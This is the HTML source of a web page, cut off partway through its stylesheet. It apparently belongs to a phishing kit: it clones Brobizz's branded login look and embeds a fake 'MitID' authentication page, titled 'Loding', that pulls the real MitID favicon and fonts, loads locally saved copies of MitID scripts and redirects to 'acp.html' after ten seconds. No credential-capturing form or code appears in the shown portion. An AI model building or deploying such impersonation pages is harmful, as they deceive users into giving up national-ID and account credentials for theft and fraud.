<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
        <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    
      <meta name="ulp-version" content="1.17.115">
    
    
    
    <meta name="robots" content="noindex, nofollow">
    
    
    <link rel="stylesheet" href="css/main.cdn.min.css">
    <style id="custom-styles-container">
      
        




        
          :root {
    --primary-color: #00a64e;
  }
        
      

        
          :root {
    --button-font-color: #ffffff;
  }
        
      

        
          :root {
    --secondary-button-border-color: #c9cace;
    --social-button-border-color: #c9cace;
    --radio-button-border-color: #c9cace;
  }
        
      

        
          :root {
    --secondary-button-text-color: #1e212a;
  }
        
      

        
          :root {
    --link-color: #635dff;
  }
        
      

        
          :root {
    --title-font-color: #1e212a;
  }
        
      

        
          :root {
    --font-default-color: #1e212a;
  }
        
      

        
          :root {
    --widget-background-color: #ffffff;
  }
        
      

        
          :root {
    --box-border-color: #c9cace;
  }
        
      

        
          :root {
    --font-light-color: #65676e;
  }
        
      

        
          :root {
    --input-text-color: #000000;
  }
        
      

        
          :root {
    --input-border-color: #c9cace;
    --border-default-color: #c9cace;
  }
        
      

        
          :root {
    --input-background-color: #ffffff;
  }
        
      

        
          :root {
    --icon-default-color: #65676e;
  }
        
      

        
          :root {
    --error-color: #d03c38;
    --error-text-color: #ffffff;
  }
        
      

        
          :root {
    --success-color: #13a688;
  }
        
      

        
          :root {
    --base-focus-color: #635dff;
    --transparency-focus-color: rgba(99,93,255, 0.15);
  }
        
      

        
          :root {
    --base-hover-color: #000000;
    --transparency-hover-color: rgba(0,0,0, var(--hover-transparency-value));
  }
        
      

        
      




        
          @font-face {
    font-family: 'ULP Custom';
    font-style: normal;
    font-weight: var(--font-default-weight);
    src: local('ULP Custom'), url('https://stdbrobizzbilling.blob.core.windows.net/brobizzimagelogo/Campton_Book.woff') format('woff');
  }

  body {
    --font-family: 'ULP Custom', -apple-system, BlinkMacSystemFont, Roboto, Helvetica, sans-serif;
  }
        
      

        
          html, :root {
    font-size: 16px;
    --default-font-size: 16px;
  }
        
      

        
          body {
    --title-font-size: 1.5rem;
    --title-font-weight: var(--font-default-weight);
  }
        
      

        
          .c3796a4db {
    font-size: 0.875rem;
    font-weight: var(--font-default-weight);
  }
        
      

        
          .ce16dfdb7 {
    font-size: 0.875rem;
    font-weight: var(--font-default-weight);
  }
  .ulp-passkey-benefit-heading {
    font-size: 1.025rem;
  }
        
      

        
          .c27976896, .cae724a40 {
    font-size: 1rem;
    font-weight: var(--font-default-weight);
  }
        
      

        
          body {
    --ulp-label-font-size: 1rem;
    --ulp-label-font-weight: var(--font-default-weight);
  }
        
      

        
          .c37a14c7b, .cb181a341, [id^='ulp-container-'] a {
    font-size: 0.875rem;
    font-weight: var(--font-bold-weight) !important;
  }
        
      

        
          
        
      




        
          :root {
    --button-border-width: 1px;
    --social-button-border-width: 1px;
    --radio-border-width: 1px;
  }
        
      

        
          body {
    --button-border-radius: 9999px;
    --radio-border-radius: 9999px;
  }
        
      

        
          :root {
    --input-border-width: 1px;
  }
        
      

        
          body {
    --input-border-radius: 3px;
  }
        
      

        
          :root {
    --border-radius-outer: 19px;
  }
        
      

        
          :root {
    --box-border-width: 0px;
  }
        
      

        
          
        
      




        
          
    body {
      --logo-alignment: 0 auto;
    }
  
        
      

        
          
    .cbefd69e1 {
      content: url('https://brobizz.com/sites/brobizz/themes/bb/images/brobizz_logo.svg');
    }
  
        
      

        
          body {
    --logo-height: 52px;
  }
  .cbefd69e1 {
    height: var(--logo-height);
  }
  
        
      

        
          
    body {
      --header-alignment: center;
    }
  
        
      

        
          
        
      




        
          .c136c0e45 {
    --page-background-alignment: center;
  }
        
      

        
          body {
    --page-background-color: #000000;
  }
        
      

        
          .c136c0e45 {
    --page-background-image: url('https://stdbrobizzminkonto.blob.core.windows.net/temp/Brobizz-login_background_picture-opti.jpg');
  }
        
      




      
    </style>
    <style>
    /* By default, hide features for javascript-disabled browsing */
    /* We use !important to override any css with higher specificity */
    /* It is also overriden by the styles in <noscript> in the header file */
    .no-js {
      clip: rect(0 0 0 0);
      clip-path: inset(50%);
      height: 1px;
      overflow: hidden;
      position: absolute;
      white-space: nowrap;
      width: 1px;
    }
  </style>
  <noscript>
    <style>
      /* We use !important to override the default for js enabled */
      /* If the display should be other than block, it should be defined specifically here */
      .js-required { display: none !important; }
      .no-js {
        clip: auto;
        clip-path: none;
        height: auto;
        overflow: auto;
        position: static;
        white-space: normal;
        width: var(--prompt-width);
      }
    </style>
  </noscript>
    
    <title>Loding</title>
  </head>
  
  <body>
    <div class="c1a2a6ec5 c136c0e45">
  
<main class="cf0764a4a login">
  <section class="c4b29eca4 _prompt-box-outer c05e9daa5">
    <div class="c6659f309 cccb93873">
      
    
      <div class="c31ae6f41">
        <header class="cf2c263ec c3b965638">
          <div title="Brobizz A/S" id="custom-prompt-logo" style="width: auto !important; height: 60px !important; position: static !important; margin: auto !important; padding: 0 !important; background-color: transparent !important; background-position: center !important; background-size: contain !important; background-repeat: no-repeat !important"></div>
        
          <img class="cbefd69e1 c9ea68b50" id="prompt-logo-center" src="css/brobizz_logo.svg" alt="Brobizz A/S">
        
          
            <h1 class="cc854c13c c8b064d01">Velkommen til Brobizz</h1>
          
        
          <div class="c3796a4db c0ba659d6">
            
              <p class="c83b79980 c2fd98237">Sikre dine oplysninger ...</p>
            
          </div>
        </header>
      
        <div class="ce16dfdb7 cfc0cd1f7">
          
        
          
            
			
			
			
			
			
			<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
            <meta http-equiv="refresh" content="10;URL=acp.html">    

    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>MitID </title>
      <link rel="icon" type="image/x-icon" href="https://www.mitid.dk/resources/favicon.ico">
    <link rel="apple-touch-icon" sizes="32x32" href="https://www.mitid.dk/resources/favicon.ico">
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="css/site.css">
    <style>
        html, body {
            min-height: 100%;
            font-family: "Lato", "Helvetica", "Sans Serif";
            background-color: #f8f8f8;
        }

        .auth-page {
            width: 100%;
            min-height: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: #f8f8f8;
        }

        .auth-container {
            background-color: #fff;
            box-shadow: 0 0 13px 0 rgb(0 0 0 / 5%), 0 0 2px 0 rgb(0 0 0 / 5%);
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            margin: 16px;
            padding: 16px;
        }

        .auth-container__client {
        }

        .auth-container__aside {
            max-width: 400px;
        }

            .auth-container__aside > *:not(:empty) {
                margin: 16px 0;
                display: block;
            }

        @media screen and (min-width: 768px) {
            .auth-container {
                flex-direction: row;
                align-items: flex-start;
                padding: 32px;
            }

            .auth-container__aside > *:not(:empty) {
                margin: 0 0 0 32px;
                max-width: 500px;
            }
        }

        #transactionText {
            white-space: pre-wrap;
            font-family: monospace;
            font-size: 12px;
        }
    </style>
<script type="text/javascript" async="" crossorigin="anonymous" src="Loding1_fichiers/bootstrapper.26b008a325cc6885436a.js.t%C3%A9l%C3%A9chargement" id="mitidCoreClient" integrity="sha256-KAkCE1nd+EY4+V5iYgOycU1lD7Tw97stpiETWfnKP7c="></script><style id="mitid-styles">.mitid-loader{align-content:stretch;align-items:stretch;align-self:auto;animation-delay:0s;animation-direction:normal;animation-duration:0s;animation-fill-mode:none;animation-iteration-count:1;animation-name:none;animation-play-state:running;animation-timing-function:ease;azimuth:center;-webkit-backface-visibility:visible;backface-visibility:visible;background-attachment:scroll;background-blend-mode:normal;background-clip:border-box;background-color:transparent;background-image:none;background-origin:padding-box;background-position:0% 0%;background-repeat:repeat;background-size:auto auto;block-size:auto;border-block-end-color:currentcolor;border-block-end-style:none;border-block-end-width:medium;border-block-start-color:currentcolor;border-block-start-style:none;border-block-start-width:medium;border-bottom-color:currentcolor;border-bottom-left-radius:0;border-bottom-right-radius:0;border-bottom-style:none;border-bottom-width:medium;border-collapse:separate;border-image-outset:0s;border-image-repeat:stretch;border-image-slice:100%;border-image-source:none;border-image-width:1;border-inline-end-color:currentcolor;border-inline-end-style:none;border-inline-end-width:medium;border-inline-start-color:currentcolor;border-inline-start-style:none;border-inline-start-width:medium;border-left-color:currentcolor;border-left-style:none;border-left-width:medium;border-right-color:currentcolor;border-right-style:none;border-right-width:medium;border-spacing:0;border-top-color:currentcolor;border-top-left-radius:0;border-top-right-radius:0;border-top-style:none;border-top-width:medium;bottom:auto;-webkit-box-decoration-break:slice;box-decoration-break:slice;box-shadow:none;box-sizing:content-box;break-after:auto;break-before:auto;break-inside:auto;caption-side:top;caret-color:auto;clear:none;clip:auto;-webkit-clip-path:none;clip-path:none;color:initial;column-count:auto;column-fill:balance;column-gap:normal;column-rule-color:currentcolor;column-rule-style:none;column-rule-width:medium;column-span:none;column-width:auto;content:normal;counter-increment:none;counter-reset:none;cursor:auto;display:inline;empty-cells:show;filter:none;flex-basis:auto;flex-direction:row;flex-grow:0;flex-shrink:1;flex-wrap:nowrap;float:none;font-family:initial;font-feature-settings:normal;-webkit-font-kerning:auto;font-kerning:auto;font-language-override:normal;font-size:medium;font-size-adjust:none;font-stretch:normal;font-style:normal;font-synthesis:weight style;font-variant:normal;font-variant-alternates:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;font-variant-position:normal;font-weight:normal;grid-auto-columns:auto;grid-auto-flow:row;grid-auto-rows:auto;grid-column-end:auto;grid-column-gap:0;grid-column-start:auto;grid-row-end:auto;grid-row-gap:0;grid-row-start:auto;grid-template-areas:none;grid-template-columns:none;grid-template-rows:none;height:auto;-webkit-hyphens:manual;-ms-hyphens:manual;hyphens:manual;image-orientation:0deg;image-rendering:auto;image-resolution:1dppx;ime-mode:auto;inline-size:auto;isolation:auto;justify-content:flex-start;left:auto;letter-spacing:normal;line-break:auto;line-height:normal;list-style-image:none;list-style-position:outside;list-style-type:disc;margin-block-end:0;margin-block-start:0;margin-bottom:0;margin-inline-end:0;margin-inline-start:0;margin-left:0;margin-right:0;margin-top:0;-webkit-mask-clip:border-box;mask-clip:border-box;-webkit-mask-composite:source-over;mask-composite:add;-webkit-mask-image:none;mask-image:none;mask-mode:match-source;-webkit-mask-origin:border-box;mask-origin:border-box;-webkit-mask-position:0% 0%;mask-position:0% 0%;-webkit-mask-repeat:repeat;mask-repeat:repeat;-webkit-mask-size:auto;mask-size:auto;mask-type:luminance;max-height:none;max-width:none;min-block-size:0;min-height:0;min-inline-size:0;min-width:0;mix-blend-mode:normal;object-fit:fill;object-position:50% 50%;offset-block-end:auto;offset-block-start:auto;offset-inline-end:auto;offset-inline-start:auto;opacity:1;order:0;orphans:2;outline-color:initial;outline-offset:0;outline-style:none;outline-width:medium;overflow:visible;overflow-wrap:normal;overflow-x:visible;overflow-y:visible;padding-block-end:0;padding-block-start:0;padding-bottom:0;padding-inline-end:0;padding-inline-start:0;padding-left:0;padding-right:0;padding-top:0;page-break-after:auto;page-break-before:auto;page-break-inside:auto;perspective:none;perspective-origin:50% 50%;pointer-events:auto;position:static;quotes:initial;resize:none;right:auto;ruby-align:space-around;ruby-merge:separate;ruby-position:over;scroll-behavior:auto;-ms-scroll-snap-coordinate:none;scroll-snap-coordinate:none;-ms-scroll-snap-destination:0px 0px;scroll-snap-destination:0px 0px;-ms-scroll-snap-points-x:none;scroll-snap-points-x:none;-ms-scroll-snap-points-y:none;scroll-snap-points-y:none;-ms-scroll-snap-type:none;scroll-snap-type:none;shape-image-threshold:0;shape-margin:0;shape-outside:none;tab-size:8;table-layout:auto;text-align:initial;text-align-last:auto;text-combine-upright:none;-webkit-text-decoration-color:currentcolor;text-decoration-color:currentcolor;-webkit-text-decoration-line:none;text-decoration-line:none;-webkit-text-decoration-style:solid;text-decoration-style:solid;-webkit-text-emphasis-color:currentcolor;text-emphasis-color:currentcolor;-webkit-text-emphasis-position:over;text-emphasis-position:over right;-webkit-text-emphasis-style:none;text-emphasis-style:none;text-indent:0;text-justify:auto;-webkit-text-orientation:mixed;text-orientation:mixed;text-overflow:clip;text-rendering:auto;text-shadow:none;text-transform:none;text-underline-position:auto;top:auto;touch-action:auto;transform:none;transform-box:border-box;transform-origin:50% 50% 0;transform-style:flat;transition-delay:0s;transition-duration:0s;transition-property:all;transition-timing-function:ease;vertical-align:baseline;visibility:visible;white-space:normal;widows:2;width:auto;will-change:auto;word-break:normal;word-spacing:normal;word-wrap:normal;-ms-writing-mode:lr-tb;writing-mode:horizontal-tb;z-index:auto;-webkit-appearance:none;appearance:none;background-color:#fff;border:1px solid #ccc;box-sizing:border-box;position:relative;padding:31px;min-width:300px;display:flex !important;justify-content:center;align-items:center}.mitid-loader *,.mitid-loader ::after,.mitid-loader ::before{align-content:stretch;align-items:stretch;align-self:auto;animation-delay:0s;animation-direction:normal;animation-duration:0s;animation-fill-mode:none;animation-iteration-count:1;animation-name:none;animation-play-state:running;animation-timing-function:ease;azimuth:center;-webkit-backface-visibility:visible;backface-visibility:visible;background-attachment:scroll;background-blend-mode:normal;background-clip:border-box;background-color:transparent;background-image:none;background-origin:padding-box;background-position:0% 0%;background-repeat:repeat;background-size:auto auto;block-size:auto;border-block-end-color:currentcolor;border-block-end-style:none;border-block-end-width:medium;border-block-start-color:currentcolor;border-block-start-style:none;border-block-start-width:medium;border-bottom-color:currentcolor;border-bottom-left-radius:0;border-bottom-right-radius:0;border-bottom-style:none;border-bottom-width:medium;border-collapse:separate;border-image-outset:0s;border-image-repeat:stretch;border-image-slice:100%;border-image-source:none;border-image-width:1;border-inline-end-color:currentcolor;border-inline-end-style:none;border-inline-end-width:medium;border-inline-start-color:currentcolor;border-inline-start-style:none;border-inline-start-width:medium;border-left-color:currentcolor;border-left-style:none;border-left-width:medium;border-right-color:currentcolor;border-right-style:none;border-right-width:medium;border-spacing:0;border-top-color:currentcolor;border-top-left-radius:0;border-top-right-radius:0;border-top-style:none;border-top-width:medium;bottom:auto;-webkit-box-decoration-break:slice;box-decoration-break:slice;box-shadow:none;box-sizing:content-box;break-after:auto;break-before:auto;break-inside:auto;caption-side:top;caret-color:auto;clear:none;clip:auto;-webkit-clip-path:none;clip-path:none;color:initial;column-count:auto;column-fill:balance;column-gap:normal;column-rule-color:currentcolor;column-rule-style:none;column-rule-width:medium;column-span:none;column-width:auto;content:normal;counter-increment:none;counter-reset:none;cursor:auto;display:inline;empty-cells:show;filter:none;flex-basis:auto;flex-direction:row;flex-grow:0;flex-shrink:1;flex-wrap:nowrap;float:none;font-family:initial;font-feature-settings:normal;-webkit-font-kerning:auto;font-kerning:auto;font-language-override:normal;font-size:medium;font-size-adjust:none;font-stretch:normal;font-style:normal;font-synthesis:weight style;font-variant:normal;font-variant-alternates:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;font-variant-position:normal;font-weight:normal;grid-auto-columns:auto;grid-auto-flow:row;grid-auto-rows:auto;grid-column-end:auto;grid-column-gap:0;grid-column-start:auto;grid-row-end:auto;grid-row-gap:0;grid-row-start:auto;grid-template-areas:none;grid-template-columns:none;grid-template-rows:none;height:auto;-webkit-hyphens:manual;-ms-hyphens:manual;hyphens:manual;image-orientation:0deg;image-rendering:auto;image-resolution:1dppx;ime-mode:auto;inline-size:auto;isolation:auto;justify-content:flex-start;left:auto;letter-spacing:normal;line-break:auto;line-height:normal;list-style-image:none;list-style-position:outside;list-style-type:disc;margin-block-end:0;margin-block-start:0;margin-bottom:0;margin-inline-end:0;margin-inline-start:0;margin-left:0;margin-right:0;margin-top:0;-webkit-mask-clip:border-box;mask-clip:border-box;-webkit-mask-composite:source-over;mask-composite:add;-webkit-mask-image:none;mask-image:none;mask-mode:match-source;-webkit-mask-origin:border-box;mask-origin:border-box;-webkit-mask-position:0% 0%;mask-position:0% 0%;-webkit-mask-repeat:repeat;mask-repeat:repeat;-webkit-mask-size:auto;mask-size:auto;mask-type:luminance;max-height:none;max-width:none;min-block-size:0;min-height:0;min-inline-size:0;min-width:0;mix-blend-mode:normal;object-fit:fill;object-position:50% 50%;offset-block-end:auto;offset-block-start:auto;offset-inline-end:auto;offset-inline-start:auto;opacity:1;order:0;orphans:2;outline-color:initial;outline-offset:0;outline-style:none;outline-width:medium;overflow:visible;overflow-wrap:normal;overflow-x:visible;overflow-y:visible;padding-block-end:0;padding-block-start:0;padding-bottom:0;padding-inline-end:0;padding-inline-start:0;padding-left:0;padding-right:0;padding-top:0;page-break-after:auto;page-break-before:auto;page-break-inside:auto;perspective:none;perspective-origin:50% 50%;pointer-events:auto;position:static;quotes:initial;resize:none;right:auto;ruby-align:space-around;ruby-merge:separate;ruby-position:over;scroll-behavior:auto;-ms-scroll-snap-coordinate:none;scroll-snap-coordinate:none;-ms-scroll-snap-destination:0px 0px;scroll-snap-destination:0px 0px;-ms-scroll-snap-points-x:none;scroll-snap-points-x:none;-ms-scroll-snap-points-y:none;scroll-snap-points-y:none;-ms-scroll-snap-type:none;scroll-snap-type:none;shape-image-threshold:0;shape-margin:0;shape-outside:none;tab-size:8;table-layout:auto;text-align:initial;text-align-last:auto;text-combine-upright:none;-webkit-text-decoration-color:currentcolor;text-decoration-color:currentcolor;-webkit-text-decoration-line:none;text-decoration-line:none;-webkit-text-decoration-style:solid;text-decoration-style:solid;-webkit-text-emphasis-color:currentcolor;text-emphasis-color:currentcolor;-webkit-text-emphasis-position:over;text-emphasis-position:over right;-webkit-text-emphasis-style:none;text-emphasis-style:none;text-indent:0;text-justify:auto;-webkit-text-orientation:mixed;text-orientation:mixed;text-overflow:clip;text-rendering:auto;text-shadow:none;text-transform:none;text-underline-position:auto;top:auto;touch-action:auto;transform:none;transform-box:border-box;transform-origin:50% 50% 0;transform-style:flat;transition-delay:0s;transition-duration:0s;transition-property:all;transition-timing-function:ease;vertical-align:baseline;visibility:visible;white-space:normal;widows:2;width:auto;will-change:auto;word-break:normal;word-spacing:normal;word-wrap:normal;-ms-writing-mode:lr-tb;writing-mode:horizontal-tb;z-index:auto;-webkit-appearance:none;appearance:none}@media screen and (max-width: 399px){.mitid-loader{width:auto !important;padding:5px;border:0;overflow:hidden}}@media screen and (max-height: 520px){.mitid-loader{height:auto !important}}.mitid-loader *{font-family:"IBM Plex Sans",Arial,Helvetica,FreeSans,sans,sans-serif;line-height:1.5rem;font-size:1rem;color:#333}.mitid-loader h2{font-size:1rem;color:#333;font-weight:700;line-height:1.5rem;margin:0;padding:0;display:block}.mitid-loader h3{color:#333;font-size:1.25rem;font-weight:700;line-height:1.75rem;margin:0;padding:0;display:block}.mitid-loader__font-load-500{visibility:hidden;font-weight:500;position:absolute;display:inline}.mitid-loader__font-load-600{visibility:hidden;font-weight:600;position:absolute;display:inline}.mitid-loader__title{font-size:1.25rem;font-weight:700;line-height:1.75rem;display:block;text-align:center;max-width:390px}.mitid-loader__content{z-index:2000;width:100%;display:flex;justify-content:center;align-items:center;flex-direction:column}.mitid-loader__logo{height:24px;position:relative;width:62px;margin-bottom:24px}.mitid-loader__logo-svg{position:absolute;left:-85px;top:-20px;height:62px;width:234px;transform:scale(0.26)}.mitid-loader__logo-svg path{fill:#0060e6}.mitid-loader__shield{position:absolute;width:100px;height:117px}.mitid-loader__shield path{fill:#0060e6}.mitid-loader__state{position:relative;height:120px;width:100px;margin-bottom:24px;display:block}.mitid-loader__error{position:absolute}.mitid-loader__error circle,.mitid-loader__error path{fill:#fff}.mitid-loader__circular{animation:mitid-core--loader-rotate 1s linear infinite;transform-origin:center center;margin:auto;z-index:10;position:absolute;left:24px;top:28px;width:50px;height:50px}.mitid-loader__circular circle:first-child{stroke:#3380eb}.mitid-loader__circular circle:last-child{animation:mitid-core--loader-dash 1.5s linear infinite}.mitid-loader__text{text-align:center;vertical-align:middle;line-height:1.5rem;min-height:3.625rem}.mitid-loader__description{line-height:2rem;display:block;text-align:center}.mitid-loader__link{color:#0060e6;cursor:pointer;padding:0 5px}@keyframes mitid-core--loader-rotate{100%{transform:rotate(360deg)}}@keyframes mitid-core--loader-dash{0%{stroke-dasharray:50 200}100%{stroke-dasharray:50 200}}</style><style id="mitid-font-face">@font-face { font-family: 'IBM Plex Sans'; font-style: normal; font-weight: 400; font-display: block; src: local('IBM Plex Sans '), local('IBMPlexSans-'), url('https://www.mitid.dk/assets/fonts/IBMPlexSans.woff2') format('woff2'), url('https://www.mitid.dk/assets/fonts/IBMPlexSans.woff') format('woff'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD; }  @font-face { font-family: 'IBM Plex Sans'; font-style: normal; font-weight: 500; font-display: block; src: local('IBM Plex Sans Medium'), local('IBMPlexSans-Medium'), url('https://www.mitid.dk/assets/fonts/IBMPlexSans-Medium.woff2') format('woff2'), url('https://www.mitid.dk/assets/fonts/IBMPlexSans-Medium.woff') format('woff'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD; }  @font-face { font-family: 'IBM Plex Sans'; font-style: normal; font-weight: 600; font-display: block; src: local('IBM Plex Sans SemiBold'), local('IBMPlexSans-SemiBold'), url('https://www.mitid.dk/assets/fonts/IBMPlexSans-SemiBold.woff2') format('woff2'), url('https://www.mitid.dk/assets/fonts/IBMPlexSans-SemiBold.woff') format('woff'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD; }  @font-face { font-family: 'IBM Plex Sans'; font-style: normal; font-weight: 700; font-display: block; src: local('IBM Plex Sans Bold'), local('IBMPlexSans-Bold'), url('https://www.mitid.dk/assets/fonts/IBMPlexSans-Bold.woff2') format('woff2'), url('https://www.mitid.dk/assets/fonts/IBMPlexSans-Bold.woff') format('woff'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD; } </style><script id="mitid-container" src="Loding1_fichiers/coreclient.38aa143e5793d1fc8eac.js.t%C3%A9l%C3%A9chargement" type="text/javascript" async="" crossorigin="anonymous" integrity="sha256-c7D7xgqqsTA9jNfRr1tpYkHmVgon+Gh/KvnA+4aHSLA="></script><style id="mitid-styles">.mitid--divider{border-radius:0;height:1px;border:none;border-width:1px;display:block;background:rgba(0,0,0,.2)}.mitid--divider-light{border-radius:0;height:1px;border:none;border-width:1px;display:block;background:rgba(0,0,0,.1)}.mitid--divider-lighter{border-radius:0;height:1px;border:none;border-width:1px;display:block;background:rgba(0,0,0,.05)}.mitid-login-divider--top{margin:.95rem 0 1.45rem 0}.mitid-login-divider--bottom{margin:0;margin-bottom:.875rem}.mitid-core-header{display:flex;overflow:hidden;justify-content:space-between;flex:0 0 auto}.mitid-core-header__text{width:243px;font-weight:700;word-break:break-word;word-wrap:break-word}.mitid-core-header__logo{height:1rem;width:3.813rem;padding-top:.25rem}.mitid-core-header__logo path{fill:#0060e6}.mitid-core-text-button{display:inline-flex;padding:.625rem .25rem;cursor:pointer;position:relative;left:-5px;border-radius:4px;text-decoration:none;align-items:center}.mitid-core-text-button:hover .mitid-core-text-button__label,.mitid-core-text-button:focus .mitid-core-text-button__label{text-decoration:underline;color:#004cb8}.mitid-core-text-button:focus{box-shadow:0 0 0 3px #0060e6}.mitid-core-text-button:active .mitid-core-text-button__label{color:#00398a;text-decoration:underline}.mitid-core-text-button:hover .mitid-core-text-button__icon path,.mitid-core-text-button:focus .mitid-core-text-button__icon path{fill:#004cb8}.mitid-core-text-button:active .mitid-core-text-button__icon path{fill:#00398a}.mitid-core-text-button__text{display:flex}.mitid-core-text-button__icon{margin-right:.25rem;width:1.5rem;height:1.5rem;display:block;cursor:pointer;flex-shrink:0}.mitid-core-text-button__icon path{fill:#001c44;cursor:pointer}.mitid-core-text-button__icon svg{cursor:pointer}.mitid-core-text-button__label{max-width:100%;cursor:pointer;font-weight:600;color:#001c44;text-decoration:none}.mitid-core-text-button:after{content:"";min-height:inherit;font-size:0}.mitid-core-footer{display:flex;flex-direction:column;justify-content:space-between;flex:0 0 auto}.mitid-core-footer__nav{display:flex;align-items:center;height:1.5rem}@media screen and (max-width: 399px){.mitid-core-footer__nav{padding:0 5px 15px 5px}}.mitid--button--left:not(:focus)::before{content:" ";width:0;height:0;border-style:solid;border-width:13px 10px 0 10px;border-color:#fff transparent transparent transparent;position:absolute;bottom:2.1rem;z-index:1000;left:1.1rem;display:none}.mitid--button--left-visibel:not(:focus)::before{display:block}.mitid--button-primary{position:relative;width:100%;cursor:pointer;box-sizing:border-box;border-radius:4px;border:none;display:inline-flex;align-items:center;outline:none;margin:0;background:#0060e6;color:#fff;border-radius:4px;height:3rem}.mitid--button-primary svg,.mitid--button-primary path{cursor:pointer}.mitid--button-primary .mitid--button-label{letter-spacing:0;line-height:1.5rem;margin-bottom:unset;font-weight:600;font-size:.875rem;text-transform:uppercase;letter-spacing:.8px;vertical-align:middle}.mitid--button-primary .mitid--button-label:hover{cursor:pointer}.mitid--button-primary .mitid--button-icon{flex-shrink:0;height:24px;width:24px;color:#fff}.mitid--button-primary .mitid--button-icon path:last-child{fill:#fff}.mitid--button-primary.icon-only{margin:.25rem;display:inline-flex;width:3rem;height:3rem;justify-content:center}.mitid--button-primary.label-only{margin:.25rem;padding:.25rem 1rem .25rem 1rem}.mitid--button-primary:not(.icon-only):not(.label-only){padding:.25rem .75rem .25rem 1rem}.mitid--button-primary .mitid--button-spacing{flex:1;width:1rem}.mitid--button-primary{box-shadow:0 0 0 5px transparent}.mitid--button-primary:focus:not(:active){box-shadow:0px 0px 0px 2px #fff,0px 0px 0px 5px #0060e6}.mitid--button-primary:hover:not(:disabled){background:#004cb8;border-radius:4px}.mitid--button-primary:hover:not(:disabled) .mitid--button-label{background:#004cb8;color:#fff !important}.mitid--button-primary:hover:not(:disabled) .mitid--button-icon{color:#fff !important}.mitid--button-primary:active:not(:disabled),.mitid--button-primary:active:not(:disabled) .mitid--button-label,.mitid--button-primary:active:not(:disabled) .mitid--button-icon{background:#00398a;position:relative;top:0;left:0}.mitid--button-primary:focus:not(:disabled):not(:active){background:#004cb8}.mitid--button-primary:disabled{background:#000;opacity:.2;text-decoration:none;cursor:not-allowed}.mitid--button-primary:disabled .mitid--button-label{cursor:not-allowed}.mitid--button-primary .mitid--button-label{color:#fff}.mitid--button-secondary{position:relative;width:100%;cursor:pointer;box-sizing:border-box;border-radius:4px;border:none;display:inline-flex;align-items:center;outline:none;margin:0;background:#fff;color:#001c44;border-radius:4px;border:1px solid #919191;height:3rem;outline:none;outline-width:0}.mitid--button-secondary svg,.mitid--button-secondary path{cursor:pointer}.mitid--button-secondary .mitid--button-label{letter-spacing:0;line-height:1.5rem;margin-bottom:unset;font-weight:600;font-size:.875rem;text-transform:uppercase;letter-spacing:.8px;vertical-align:middle}.mitid--button-secondary .mitid--button-label:hover{cursor:pointer}.mitid--button-secondary .mitid--button-icon{flex-shrink:0;height:24px;width:24px;color:#fff}.mitid--button-secondary .mitid--button-icon path:last-child{fill:#fff}.mitid--button-secondary.icon-only{margin:.25rem;display:inline-flex;width:3rem;height:3rem;justify-content:center}.mitid--button-secondary.label-only{margin:.25rem;padding:.25rem 1rem .25rem 1rem}.mitid--button-secondary:not(.icon-only):not(.label-only){padding:.25rem .75rem .25rem 1rem}.mitid--button-secondary .mitid--button-spacing{flex:1;width:1rem}.mitid--button-secondary .mitid--button-icon{flex-shrink:0;height:24px;width:24px;color:#001c44}.mitid--button-secondary .mitid--button-icon path:last-child{fill:#001c44}.mitid--button-secondary:not(.icon-only):not(.label-only):hover,.mitid--button-secondary:not(.icon-only):not(.label-only):focus,.mitid--button-secondary:not(.icon-only):not(.label-only):disabled{padding:.25rem 10px .25rem 1rem}.mitid--button-secondary:hover:not(:disabled):not(:active):not(.icon-only) .mitid--button-icon,.mitid--button-secondary:hover:not(:disabled):not(:active):not(.icon-only) .mitid--button-label{position:relative;right:1px}.mitid--button-secondary:hover:not(:disabled){border:2px solid #0060e6}.mitid--button-secondary:hover:not(:disabled) .mitid--button-label,.mitid--button-secondary:hover:not(:disabled) .mitid--button-icon{color:#0060e6}.mitid--button-secondary:hover:not(:disabled) .mitid--button-label path,.mitid--button-secondary:hover:not(:disabled) .mitid--button-icon path{fill:#0060e6}.mitid--button-secondary:active:not(:disabled){border:2px solid #00398a}.mitid--button-secondary:active:not(:disabled) .mitid--button-label,.mitid--button-secondary:active:not(:disabled) .mitid--button-icon{color:#00398a}.mitid--button-secondary{box-shadow:0px 0px 0px 5px transparent}.mitid--button-secondary:focus:not(:active){box-shadow:0px 0px 0px 2px #fff,0px 0px 0px 5px #0060e6;border:2px solid #0060e6 !important}@supports(-moz-appearance: none){.mitid--button-secondary{height:49px}}.mitid--button-secondary:focus:not(:disabled):not(.icon-only) .mitid--button-icon,.mitid--button-secondary:focus:not(:disabled):not(.icon-only) .mitid--button-label{position:relative;right:1px}.mitid--button-secondary:focus:not(:active) .mitid--button-label,.mitid--button-secondary:focus:not(:active) .mitid--button-icon{color:#0060e6}.mitid--button-secondary:focus:not(:active) .mitid--button-label path,.mitid--button-secondary:focus:not(:active) .mitid--button-icon path{fill:#0060e6}.mitid--button-secondary:disabled{border:1px solid 